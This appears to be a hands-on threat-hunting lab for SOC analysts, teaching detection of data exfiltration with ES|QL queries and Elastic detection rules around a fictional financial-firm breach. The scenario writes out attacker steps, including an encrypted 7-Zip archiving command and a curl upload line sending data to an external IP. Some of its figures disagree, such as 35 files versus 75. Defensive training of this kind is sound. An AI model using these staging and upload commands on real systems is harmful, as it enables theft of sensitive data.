How to Detect Data Exfiltration with Elastic SIEM: SOC Analyst Hands-On Lab

Hunt Forward Lab #007 — Threat Hunting for Bulk File Transfer & Archive Creation | MITRE ATT&CK T1039, T1560.001, T1048.002

🔬 Difficulty: Intermediate — Estimated Time: 45–60 minutes 🗂️ MITRE ATT&CK: T1039 / T1560.001 / T1048.002 — Data from Network Shared Drive / Archive via Utility / Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Press enter or click to view image in full size

Image created by chatgpt

How to use this lab: Read the story to understand the attack. Then follow the Hunt section to find it yourself in Elastic SIEM. Document your findings in your Hunt Notebook as you go — you’ll use them to build your GitHub portfolio at the end.

Part 1 — The Scenario

1a — The Story Scene

Thursday afternoon. Meridian Financial’s SOC. 4:47 PM.

Alex Chen had been staring at the same DLP alert for six minutes when Marcus wheeled over.

“What’ve you got?”

“Nothing. That’s the problem.” She tilted the screen toward him. “DLP flagged a large outbound transfer to an external IP at 15:10. By the time the alert fired, the connection was already closed. The file is gone.”

Marcus studied the IP. “203.0.113.42. That’s the same C2 we saw last quarter.”

“Yeah.” Alex pulled up the endpoint timeline for WKSTN-MORGAN. "Morgan's machine. Service account — svc_emr_db. Which means someone with stolen credentials got onto a workstation and used a service account context to avoid triggering our user-behaviour baselines."

“Smart.” Marcus did not sound impressed. “What was transferred?”

“That’s what I’m trying to figure out. The DLP alert gives us the destination and the volume — 47 megabytes. It doesn’t tell us what 47 megabytes of data looked like before it left.”

That was the thing about data exfiltration. By the time most teams noticed it, the data was already gone. The only way to understand the scope — and answer the question every executive was going to ask in twenty minutes — was to work backwards. What files were accessed before the transfer? How were they packaged? How were they sent?

Alex opened a new ES|QL query and started at the beginning.

Now it’s your turn to find it.

1b — How Data Exfiltration Works — Simply Explained

Step 1: What attackers are actually trying to steal

After an attacker gets into a network — through phishing, stolen credentials, or lateral movement — their end goal is usually data. Financial records, patient files, intellectual property, credentials, employee PII. The data has value: for selling, for ransom leverage, or for competitive intelligence. But they can’t just walk out with a hard drive. They have to move the data across the network to somewhere they control, without triggering alerts designed to catch exactly that.

Step 2: The three phases every exfiltration attempt goes through

Attackers almost never upload raw files directly. They follow a three-step process that each leave their own tracks in your logs:

Collection — bulk-reading or copying files from network shares to a local staging location. This is where the volume anomaly appears: one account reading dozens of sensitive files in minutes.
Archiving — compressing and encrypting the staged files into a single archive using tools like 7-Zip or PowerShell’s Compress-Archive. Encryption hides the contents from DLP inspection; compression reduces transfer time and volume.
Exfiltration — uploading the archive to an attacker-controlled server over HTTPS, making the traffic look like a normal encrypted web request.

The attacker’s advantage: each step looks almost normal in isolation. File access, archive creation, and HTTPS uploads all happen constantly in a healthy network. The signal is in the combination — and the statistical outliers.

Step 3: How the attack works

Normal file server activity (a single employee accessing one report):

User: a.chen | File: Q4_report.xlsx | Size: 280 KB | Process: EXCEL.EXE
Time: 09:15 → 09:16 | 1 file in ~60 seconds

Attacker bulk-staging data (stolen service account):

User: svc_emr_db | Files: 35 files across EMR$, Finance$, HR$, Legal$
Sizes: 1 MB – 8 MB per file | Process: robocopy.exe
Time: 14:00 → 14:43 | 35 files in 43 minutes | ~47 MB total

Then: 7z.exe -tzip -p[password] -mhe=on → update_pkg.zip (45 MB encrypted)
Then: curl.exe POST https://203.0.113.42/api/upload (8 chunks × ~6 MB)

What DLP sees vs what actually happened:

DLP alert: "Large outbound transfer: 47 MB to 203.0.113.42"
What it misses: 35 files read, 43 minutes of staging, 7z.exe with -mhe (header encryption)

Step 4: Why defenders miss it

┌─────────────────────────────────────────────────────────────────────────────┐
│  WHAT SECURITY TOOLS SEE                                                    │
│                                                                             │
│  File access:    svc_emr_db read 35 files — service accounts do this       │
│  7z.exe:         compression utility — IT uses it for backups               │
│  HTTPS upload:   encrypted outbound traffic — indistinguishable from SaaS  │
│  Total time:     ~2 hours — spread thin enough to avoid rate alerts         │
│                                                                             │
│  WHAT ACTUALLY HAPPENED                                                     │
│                                                                             │
│  35 sensitive files read in 43 minutes — 50× normal rate for this account  │
│  7z.exe from AppData\Temp — not from Program Files (attacker-dropped tool) │
│  curl.exe from AppData\Temp — not a standard user workstation binary       │
│  8 uploads to same external IP — internal backup goes to 10.0.0.50, not   │
│  203.0.113.42                                                               │
└─────────────────────────────────────────────────────────────────────────────┘

Think of it like a warehouse with an inventory system. Every item that leaves has to be scanned out — but the system only flags individual items over a certain weight. An attacker who takes 35 medium-sized boxes, repackages them into one large crate labelled “equipment return,” and ships it out via the regular loading dock never triggers a single scan. The anomaly isn’t any one step. It’s the sequence.

Step 5: Why it leaves tracks

Exfiltration can’t hide the following statistical signatures — and each one is a hunt signal:

Access rate spike — one account reading far more files per minute than its own historical baseline, especially across multiple sensitive share paths simultaneously
Archive tool process in unexpected path — 7z.exe or Compress-Archive spawned from AppData\Temp or C:\Users\*\AppData rather than a managed software directory
Asymmetric upload ratio — network connections where bytes_out massively exceeds bytes_in (uploads, not browsing); normal HTTPS traffic is the opposite
Single external destination, chunked volume — the same external IP receiving multiple large uploads in sequence, each sized just under a DLP threshold

None of that is a signature. But an analyst with the right ES|QL query can spot it in seconds. That’s exactly what you’re about to do.

Part 2 — Your Mission

By the end of this lab you will have:

✅ Detected a bulk file collection burst using file access rate analysis
✅ Found archive creation by an attacker-dropped 7-Zip binary in a suspicious path
✅ Identified chunked HTTPS exfiltration using upload-ratio anomaly detection
✅ Quantified the total data loss in megabytes
✅ Built a complete attack timeline from collection → archive → exfil → cleanup
✅ Documented the full investigation in your Hunt Notebook for your GitHub portfolio

Part 3 — Lab Setup

Getting Into the Lab

No manual Elastic setup required — Hunt Forward handles all of it.

Go to hunt-forward.com
Enter your email — Stripe checkout, card required, not charged for 7 days
Dashboard unlocks immediately — all labs accessible
Accept the Elastic Cloud invite → “Accept Invitation → Access SIEM”
Check your dashboard status — Pending → ✓ Invite Sent within ~5 minutes

Once you’re in Elastic — CLICK HERE or:

Kibana → Discover
Index: exfil-lab-logs
Time range: March 6, 2025, 10:00 AM — 6:00 PM

A Quick Word on ES|QL

Throughout this lab we use ES|QL — Elasticsearch Query Language — instead of clicking through visualisation menus. ES|QL lets you filter, group, count, and calculate statistics on your logs in a single query, directly in Discover.

Every ES|QL query starts with FROM and pipes data through commands using |. Think of each | as "then do this next thing to the results."

To run ES|QL in Kibana:

In Discover, click the language selector dropdown (top left — it may say KQL or Lucene)
Select ES|QL
Paste the query and press Run (▶)

Part 4 — The Hunt

Hunt 1 — File Access Rate Spike (Bulk Collection)

The first signal in any exfiltration is the collection phase. Attackers need to stage data locally before they can archive and send it. That means one account reading a high volume of files in a short window — a rate that stands out against every other user on the file server.

The key insight: we’re not looking for a specific filename. We’re looking for abnormal access velocity from a single identity across multiple sensitive share paths.

FROM exfil-lab-logs
| WHERE event.category == "file"
  AND event.action == "file-accessed"
| STATS
    file_count = COUNT(*),
    total_bytes = SUM(file.size),
    unique_paths = COUNT_DISTINCT(file.path)
    BY host.name, user.name, process.name
| EVAL total_mb = ROUND(total_bytes / 1048576.0, 2)
| WHERE file_count > 10
| SORT file_count DESC
| LIMIT 20

What each line does:

FROM exfil-lab-logs — query the lab dataset
WHERE event.category == "file" AND event.action == "file-accessed" — scope to file read events only, filtering out write and delete events
STATS file_count = COUNT(*), total_bytes = SUM(file.size), unique_paths = COUNT_DISTINCT(file.path) BY host.name, user.name, process.name — count how many files each user+host+process combination touched, sum the total bytes, and count distinct file paths to measure breadth of access
EVAL total_mb = ROUND(total_bytes / 1048576.0, 2) — convert raw bytes to megabytes inline, rounded to 2 decimal places
WHERE file_count > 10 — filter out low-volume normal activity; focus on accounts that read more than 10 files
SORT file_count DESC — surface the highest-volume accessor first
LIMIT 20 — return top 20 rows

What to look for in results: The top row should stand out dramatically from all others. Look for a user+process combination where file_count is 10× or more above the next row, where total_mb is in the tens of megabytes, and where process.name is something unexpected for file access — robocopy.exe instead of EXCEL.EXE or explorer.exe.

📝 Hunt Notebook checkpoint: Record the top anomalous row: user name, host name, process name, file count, and total MB accessed. Note whether the accessing process is a normal office application or a bulk-copy/scripting tool.
✅ Bulk collection confirmed. svc_emr_db on WKSTN-MORGAN accessed 75 files totalling ~47 MB via robocopy.exe — vastly above any other user in the dataset. The process alone is a red flag: robocopy.exe has no legitimate reason to be running under a service account from a workstation.

Hunt 2 — Archive Creation in a Suspicious Path

The second signal is the archiving step. Legitimate compression tools like 7-Zip are installed by IT to C:\Program Files\7-Zip\7z.exe. An attacker who drops their own copy to AppData\Temp to avoid relying on IT-managed software is visible the moment you filter on the executable path.

Get Hunt Forward’s stories in your inbox

Join Medium for free to get updates from this writer.

Remember me for faster sign in

We also look for password-protected compression (-p flag) and encrypted headers (-mhe=on) in the command line — features that have no use case in a legitimate backup or IT workflow.

FROM exfil-lab-logs
| WHERE event.category == "process"
  AND (
    process.name == "7z.exe"
    OR process.name == "7za.exe"
    OR process.command_line LIKE "*Compress-Archive*"
    OR process.command_line LIKE "*-tzip*"
  )
| EVAL suspicious_path = CASE(
    process.executable LIKE "*\\\\AppData\\\\*", "YES — AppData",
    process.executable LIKE "*\\\\Temp\\\\*", "YES — Temp",
    process.executable LIKE "*\\\\ProgramData\\\\*", "YES — ProgramData",
    "NO — managed path"
  )
| EVAL has_password = CASE(
    process.command_line LIKE "*-p*", "YES",
    "NO"
  )
| KEEP host.name, user.name, process.name, process.executable,
       process.command_line, process.parent.name,
       suspicious_path, has_password, @timestamp
| SORT @timestamp ASC

What each line does:

WHERE event.category == "process" AND (...) — find any process event involving common archive utilities or PowerShell compression commands
EVAL suspicious_path = CASE(...) — derive a label field: flag the row if the archive tool is running from AppData, Temp, or ProgramData — directories where attackers drop tools to avoid IT software inventories
EVAL has_password = CASE(...) — flag rows where the command line contains -p, indicating password-protected compression
KEEP ... — return only the fields relevant to this investigation, reducing noise
SORT @timestamp ASC — order by time so you can see the archive creation sequence as it happened

What to look for in results: Any row where suspicious_path = YES — AppData or similar is an immediate priority. Combine that with has_password = YES and you have a high-confidence archive creation event. Note the process.parent.name — if the archiver was spawned by cmd.exe or powershell.exe rather than an installer, that's a further indicator of attacker activity.

📝 Hunt Notebook checkpoint: Record the full process.command_line for any flagged row. Note the output filename in the command (the archive name the attacker chose), the executable path (confirms it's not a managed installation), and the password flag. The archive filename often reveals the attacker's masquerade strategy.
✅ Rogue archive creation confirmed. 7z.exe ran from C:\Users\morgan\AppData\Local\Temp\7z.exe — attacker-dropped, not IT-managed — with flags -tzip -p3x!tr@c3d -mhe=on, creating a password-encrypted, header-encrypted ZIP. The output was named WindowsDefender_Update_KB5034441.zip to masquerade as a Windows patch package.

Hunt 3 — Asymmetric Upload Detection (Exfiltration)

Normal HTTPS browsing is asymmetric in one direction: users download far more than they upload. A request to load a webpage sends a few hundred bytes out and receives megabytes back. When you see the pattern reversed — large bytes_out, tiny bytes_in — on an outbound HTTPS connection, that's an upload. When it's repeated, to a single external IP, in chunks, that's exfiltration.

FROM exfil-lab-logs
| WHERE event.category == "network"
  AND network.direction == "outbound"
  AND destination.port == 443
  AND network.bytes_out IS NOT NULL
| EVAL mb_out = ROUND(network.bytes_out / 1048576.0, 2)
| EVAL mb_in = ROUND(network.bytes_in / 1048576.0, 2)
| EVAL upload_ratio = ROUND(network.bytes_out / (network.bytes_in + 1), 1)
| WHERE mb_out > 1.0
| STATS
    transfer_count = COUNT(*),
    total_mb_out = ROUND(SUM(network.bytes_out) / 1048576.0, 2),
    avg_mb_per_transfer = ROUND(AVG(network.bytes_out) / 1048576.0, 2),
    max_upload_ratio = MAX(upload_ratio)
    BY host.name, user.name, destination.ip, process.name
| WHERE transfer_count >= 2
| SORT total_mb_out DESC
| LIMIT 15

What each line does:

WHERE ... destination.port == 443 AND network.bytes_out IS NOT NULL — scope to HTTPS outbound connections that have byte-count telemetry
EVAL mb_out = ROUND(network.bytes_out / 1048576.0, 2) — convert bytes sent to megabytes
EVAL mb_in = ROUND(network.bytes_in / 1048576.0, 2) — convert bytes received to megabytes
EVAL upload_ratio = ROUND(network.bytes_out / (network.bytes_in + 1), 1) — compute the ratio of sent to received; adding 1 to the denominator prevents division-by-zero; a ratio of 1000+ means the connection is almost entirely outbound
WHERE mb_out > 1.0 — filter out small requests; focus on transfers over 1 MB
STATS transfer_count = COUNT(*), total_mb_out = ROUND(SUM(...) / 1048576.0, 2), avg_mb_per_transfer = ..., max_upload_ratio = MAX(upload_ratio) BY host.name, user.name, destination.ip, process.name — group by destination IP and summarise: how many transfers, total volume, average chunk size, and peak ratio
WHERE transfer_count >= 2 — filter to destinations that received multiple large uploads (chunked exfil pattern)
SORT total_mb_out DESC — surface the highest-volume destination first

What to look for in results: The top row should show a single external IP receiving multiple transfers with a massive total_mb_out value and a max_upload_ratio in the thousands. Cross-reference the destination IP against the C2 you found in earlier labs. The process.name of curl.exe on a standard user workstation is another high-confidence indicator — curl is a developer/admin tool rarely present on end-user machines.

📝 Hunt Notebook checkpoint: Record the destination IP, total MB exfiltrated, transfer count, average chunk size, and the process responsible. The total_mb_out figure is your data loss estimate — this number goes in the executive summary of your incident report.
✅ Exfiltration confirmed. curl.exe on WKSTN-MORGAN sent 8 transfers totalling ~47 MB to 203.0.113.42:443, with an average upload ratio of ~9,000:1 (near-zero response, massive upload). The destination IP matches the known C2 from the organisation's prior incidents.

Hunt 4 — Cleanup and Full Attack Scope

Attackers who clean up after themselves leave a different kind of evidence: file deletion events, directory removal, and a suspicious absence of the staging artefacts you’d expect to find. Correlating the cleanup events with the earlier signals confirms the full attack chain and gives you precise timestamps for your timeline.

FROM exfil-lab-logs
| WHERE host.name == "WKSTN-MORGAN"
  AND (
    (event.category == "file" AND event.action IN ("file-created", "file-deleted", "directory-deleted", "file-renamed"))
    OR (event.category == "process" AND process.name IN ("7z.exe", "robocopy.exe", "curl.exe", "cmd.exe"))
  )
| EVAL event_label = CASE(
    event.action == "file-accessed" AND process.name == "robocopy.exe", "1-COLLECTION",
    process.name == "7z.exe", "2-ARCHIVE",
    event.action == "file-renamed", "2-MASQUERADE",
    process.name == "curl.exe", "3-EXFILTRATION",
    event.action IN ("file-deleted", "directory-deleted"), "4-CLEANUP",
    "OTHER"
  )
| KEEP @timestamp, event_label, event.action, file.name, file.path,
       process.name, process.command_line, user.name
| SORT @timestamp ASC
| LIMIT 50

What each line does:

WHERE host.name == "WKSTN-MORGAN" — scope entirely to the compromised host identified in Hunts 1–3
AND (...) — filter to file creation/deletion events and the specific attacker processes we've confirmed
EVAL event_label = CASE(...) — derive a phase label for each event: assigns "1-COLLECTION", "2-ARCHIVE", "3-EXFILTRATION", or "4-CLEANUP" based on the action and process name, so the results read as a timeline rather than a raw event list
KEEP ... — surface only the fields needed to reconstruct the timeline
SORT @timestamp ASC — chronological order, earliest to latest

What to look for in results: You should see a clean four-phase progression: collection events (robocopy file accesses) → archive creation (7z.exe) and rename → exfiltration (curl.exe uploads) → cleanup (file and directory deletions). Any gaps in the sequence are worth noting. The cleanup events confirm the attacker had operational security awareness — they didn’t just leave artefacts behind.

📝 Hunt Notebook checkpoint: Record the timestamp of the first collection event, the archive creation timestamp, the first and last upload timestamps, and the cleanup timestamp. Calculate the total attack window (first collection to last cleanup). Note the archive name used as a masquerade, and record all deleted files and directories as forensic artefacts that are no longer recoverable from the endpoint.
✅ Full attack chain confirmed. Four-phase exfiltration: collection (14:00–14:43) → archive + masquerade (14:45) → chunked HTTPS upload (15:10–15:58) → cleanup (16:05). Total window: ~2 hours. Total data loss: ~47 MB. Evidence of operational security: attacker renamed archive to a Windows patch filename and deleted all staging artefacts on exit.

Part 5 — Building Your Timeline

┌─[WKSTN-MORGAN — Data Exfiltration Timeline]─────────────────────────────────────────┐
│  TIME (UTC)   │  EVENT                                    │  PHASE                   │
│───────────────┼───────────────────────────────────────────┼──────────────────────────│
│  14:00        │  robocopy.exe launched by svc_emr_db      │  Collection begins       │
│  14:00–14:43  │  35 files read from EMR$, Finance$, HR$   │  Bulk staging (~47 MB)   │
│  14:43        │  robocopy.exe exits                       │  Staging complete        │
│  14:45        │  7z.exe (AppData\Temp) creates archive    │  Archive + encryption    │
│  14:45:47     │  update_pkg.zip created (45 MB)           │  Compressed payload      │
│  14:45:55     │  Renamed → WindowsDefender_Update_KB*.zip │  Masquerade applied      │
│  15:08        │  curl.exe dropped to AppData\Temp         │  Transfer tool staged    │
│  15:10        │  Upload chunk 1/8 → 203.0.113.42:443      │  Exfiltration begins     │
│  15:10–15:58  │  8 × ~6 MB HTTPS POST chunks              │  47 MB exfiltrated       │
│  16:05        │  update_pkg.zip deleted                   │  Cleanup begins          │
│  16:05        │  staging\ directory removed               │  Evidence destruction    │
│  16:07        │  curl.exe deleted                         │  Tool removed            │
└─────────────────────────────────────────────────────────────────────────────────────┘

Part 6 — Document Your Hunt (Hunt Notebook → GitHub Portfolio)

Open your Hunt Notebook in the Hunt Forward dashboard. The pre-loaded template has every section ready for your findings.

Option A — Write your own report: Merge your four Hunt Notebook milestone blocks into a single document. Add a cover section:

Analyst name and date
Executive summary: what was stolen, from which host, via which account, total data volume
IOC table: svc_emr_db, WKSTN-MORGAN, 203.0.113.42, C:\Users\morgan\AppData\Local\Temp\7z.exe, C:\Users\morgan\AppData\Local\Temp\curl.exe, archive filename
Recommended remediation: isolate WKSTN-MORGAN, revoke svc_emr_db credentials, block 203.0.113.42 at perimeter, notify legal/compliance of ~47 MB potential PII exposure

Export as markdown → push to GitHub as hunt-007-data-exfiltration-detection.md

Option B — Download the Hunt Forward reference report: Use it to check your findings before writing your own version.

The recommendation: Write your own. The data loss quantification you produced in Hunt 3 — a specific megabyte figure, a named external IP, a confirmed process — is exactly the kind of evidence a CISO asks for in a breach notification decision. The fact that you can walk an interviewer through how you calculated it, line by line, is what makes this portfolio piece real.

Part 7 — What Alex Did Next

The executive summary took eleven minutes. 47 MB from EMR$, Finance$, HR$, and Legal$ — patient records, payroll data, wire transfer accounts, pending litigation files. The legal team was on the phone before Alex had finished typing the IOC table. Marcus submitted the containment ticket for WKSTN-MORGAN and the credential revocation for svc_emr_db simultaneously.

The DLP alert that started it all had fired forty-seven minutes after the first file was read. Alex added a note to the runbook: next time someone with a service account touches robocopy, don’t wait for DLP to tell you.

Part 8 — Operationalise Your Hunts as Detection Rules

Hunting manually is how you find the first incident. Detection rules are how you make sure the next analyst doesn’t have to start from scratch.

Each ES|QL query you ran in Part 4 can be turned into a standing rule in Elastic Security that fires automatically when the same pattern appears. Import the three rules below and they will run every 5 minutes against your exfil-lab-logs index — or swap the index name for your production data source.

To import: Elastic Security → Detection Rules → Import rules → select the .ndjson file from your Hunt Forward dashboard.

Rule 1 — Bulk File Collection via Network Share (HIGH)

Fires when a single account reads more than 20 files totalling over 10 MB using a bulk-copy process. Legitimate users access individual files on demand; this rate indicates automated staging.

FROM exfil-lab-logs*
| WHERE event.category == "file"
  AND event.action == "file-accessed"
  AND process.name IN ("robocopy.exe", "xcopy.exe", "cmd.exe", "powershell.exe")
| STATS
    file_count   = COUNT(*),
    total_bytes  = SUM(file.size),
    unique_paths = COUNT_DISTINCT(file.path)
    BY host.name, user.name, process.name
| EVAL total_mb = ROUND(total_bytes / 1048576.0, 2)
| WHERE file_count > 20
  AND total_mb > 10
| SORT total_mb DESC

When this fires: Pivot to Hunt 1. Check whether 7z.exe or archive activity follows within 30 minutes — if Rule 2 also fires for the same host, you have a confirmed collection-to-archive sequence. Record total_mb in your Elastic Security Case as the staging volume estimate.

False positives to validate: Scheduled backup agents (BackupExec, Veeam) running under a known service account; IT mass file migrations during change-management windows.

Rule 2 — Archive Creation from Suspicious Path (HIGH)

Fires when 7-Zip or PowerShell Compress-Archive runs from a user-writable directory (AppData, Temp, ProgramData) rather than a managed installation path. Attacker-dropped archive tools live in user-writable directories to avoid software inventory detection. Password flags (-p, -mhe) indicate deliberate encryption to defeat DLP content inspection.

FROM exfil-lab-logs*
| WHERE event.category == "process"
  AND (
    process.name == "7z.exe"
    OR process.name == "7za.exe"
    OR process.command_line LIKE "*Compress-Archive*"
  )
| EVAL suspicious_path = CASE(
    process.executable LIKE "*\\\\AppData\\\\*",    "YES",
    process.executable LIKE "*\\\\Temp\\\\*",       "YES",
    process.executable LIKE "*\\\\ProgramData\\\\*","YES",
    "NO"
  )
| EVAL has_password = CASE(
    process.command_line LIKE "*-p*", "YES",
    "NO"
  )
| WHERE suspicious_path == "YES"
| KEEP @timestamp, host.name, user.name, process.name,
       process.executable, process.command_line,
       process.parent.name, suspicious_path, has_password
| SORT @timestamp ASC

When this fires: Inspect the full process.command_line for the output archive path and filename — attackers frequently rename archives to mimic Windows patch packages (KB*.zip) or system files. Correlate with Rule 1 (bulk collection) and Rule 3 (asymmetric upload) to confirm the full exfiltration chain.

False positives to validate: Developers using portable 7-Zip builds in project directories; IT scripts that compress logs or reports using system PowerShell — review parent process and output path before dismissing.

Rule 3 — Chunked HTTPS Exfiltration — Asymmetric Upload (CRITICAL)

Fires when the same external IP receives 2 or more large HTTPS transfers totalling over 5 MB with an upload ratio above 100:1. Normal browsing sends small requests and receives large responses — exfiltration reverses this. Chunked transfers to a single destination indicate deliberate splitting to stay under DLP byte thresholds.

FROM exfil-lab-logs*
| WHERE event.category == "network"
  AND network.direction == "outbound"
  AND destination.port == 443
  AND network.bytes_out IS NOT NULL
| EVAL mb_out       = ROUND(network.bytes_out / 1048576.0, 2)
| EVAL upload_ratio = ROUND(network.bytes_out / (network.bytes_in + 1), 1)
| WHERE mb_out > 1.0
| STATS
    transfer_count  = COUNT(*),
    total_mb_out    = ROUND(SUM(network.bytes_out) / 1048576.0, 2),
    avg_mb_per_xfer = ROUND(AVG(network.bytes_out) / 1048576.0, 2),
    max_ratio       = MAX(upload_ratio)
    BY host.name, user.name, destination.ip, process.name
| WHERE transfer_count >= 2
  AND total_mb_out > 5
  AND max_ratio > 100
| SORT total_mb_out DESC

When this fires: The total_mb_out value is your data loss estimate for executive reporting — record it in your Elastic Security Case immediately. Add destination.ip as a network IOC. If Rules 1 and 2 also fired for the same host within the preceding 2 hours, treat this as a confirmed exfiltration chain and escalate to critical incident response.

False positives to validate: Cloud backup agents (Acronis, CrashPlan, Backblaze) uploading to known endpoints — add backup destination IPs to an exception list; large file sharing via approved SaaS (SharePoint, Dropbox, Box) — validate destination IP against known SaaS CIDR ranges.

Press enter or click to view image in full size

Image created by chatgpt

Ready for the Next Lab?

Lab #008 — Insider Threat Detection: Hunting behavioural baselines when the attacker already has legitimate credentials

New labs drop 2–3 times per week on Hunt Forward and Medium.